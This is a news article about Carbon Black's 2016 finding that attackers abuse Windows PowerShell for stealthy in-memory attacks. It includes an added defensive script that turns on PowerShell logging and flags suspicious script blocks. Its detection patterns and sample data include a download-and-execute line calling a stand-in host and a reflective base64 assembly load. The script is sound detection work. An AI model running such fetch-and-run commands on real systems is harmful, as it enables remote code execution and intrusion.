13 Apr 2016

Attackers are using Microsoft's PowerShell to cloak their activities, warns Carbon Black

There has been a substantial increase in attackers exploiting Microsoft's PowerShell, a Windows task automation and configuration management framework, during cyberattacks, according to a study [.pdf] released Tuesday by security firm Carbon Black.

This is part of a growing industry-wide trend of malware authors attempting to evade detection by using tools native to the operating system.

"The bad guys are evolving and they are trying to use more tools and techniques that are built into the operating system, whether it is Windows, Mac, Linux, or whatever. ... Once people get into your environment and can use your built-in tools, it just makes them more stealthy and effective. It's just a harder attack to defend against," said Ben Johnson, co-founder and chief security strategist at Carbon Black.

PowerShell is a ubiquitous technology in Windows, and it serves as an ideal way for attackers to remain undetected. Its ability to dynamically load and execute code without touching the file system makes it especially difficult to secure, according to Carbon Black.
"PowerShell is too powerful. It can do all sorts of things on the system. And it does it through running scripts. So the attackers can run scripts, and it makes them very efficient as developers," Johnson told FierceITSecurity.
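The defender-side counterpart to the in-memory execution described above, as an added example that is not from the article or from Carbon Black's report: a script that turns on PowerShell Script Block and Module Logging (so script content is recorded even when nothing is written to disk) and a small triage function that flags logged script blocks showing fetch-and-run-in-memory patterns. The registry paths and event ID 4104 are standard Windows PowerShell logging settings; the pattern list, function names and sample script blocks are the author's own constructions.

```powershell
# Added example, not the article's or Carbon Black's code. Run on Windows as an
# administrator to apply the logging policy; the offline triage part runs anywhere.

# 1. Enable Script Block Logging (event ID 4104) and Module Logging via policy keys.
function Enable-PowerShellScriptLogging {
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    New-Item -Path "$base\ScriptBlockLogging" -Force | Out-Null
    Set-ItemProperty -Path "$base\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord
    New-Item -Path "$base\ModuleLogging\ModuleNames" -Force | Out-Null
    Set-ItemProperty -Path "$base\ModuleLogging" -Name EnableModuleLogging -Value 1 -Type DWord
    Set-ItemProperty -Path "$base\ModuleLogging\ModuleNames" -Name '*' -Value '*'   # log every module
}

# 2. Heuristic triage: which indicators of in-memory loading does a script block show?
#    This is a defender's starting list (hypothetical), not a complete signature set.
function Find-InMemoryExecutionIndicator {
    param([Parameter(Mandatory)][string]$ScriptText)
    $patterns = [ordered]@{
        'Invoke-Expression'        = '\b(Invoke-Expression|IEX)\b'
        'web download to memory'   = 'Net\.WebClient.*Download(String|Data)|Invoke-WebRequest|Invoke-RestMethod'
        'base64 decode'            = 'FromBase64String'
        'reflective assembly load' = '\[System\.Reflection\.Assembly\]::Load'
    }
    foreach ($name in $patterns.Keys) {
        if ($ScriptText -match $patterns[$name]) { $name }   # -match is case-insensitive
    }
}

# 3a. Offline check on constructed sample script blocks (made up for this example).
$samples = @(
    'Get-ChildItem C:\Temp | Sort-Object Length',
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/stage.ps1")',
    '[System.Reflection.Assembly]::Load([Convert]::FromBase64String($blob))'
)
foreach ($s in $samples) {
    [pscustomobject]@{ Script = $s; Indicators = (Find-InMemoryExecutionIndicator $s) -join ', ' }
}

# 3b. Live use on real 4104 events (after Enable-PowerShellScriptLogging has been applied).
function Get-SuspiciousScriptBlockEvent {
    Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} `
                 -MaxEvents 500 -ErrorAction SilentlyContinue |
        ForEach-Object {
            $hits = Find-InMemoryExecutionIndicator $_.Message
            if ($hits) { [pscustomobject]@{ Time = $_.TimeCreated; Indicators = ($hits -join ', ') } }
        }
}
```

Expect the first sample to produce no indicators, the second to flag Invoke-Expression and a web download, and the third to flag base64 decoding and a reflective assembly load; Module Logging emits event ID 4103 alongside 4104 and can be triaged the same way.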
For the PowerShell exploitation study, Carbon Black pulled data from more than 1,100 investigations, stemming from 24 partners in the cybersecurity community. The company released the report at the start of the Threat Hunting and IR Summit being held in New Orleans and sponsored by Carbon Black and the SANS Institute.

fierceitsecurity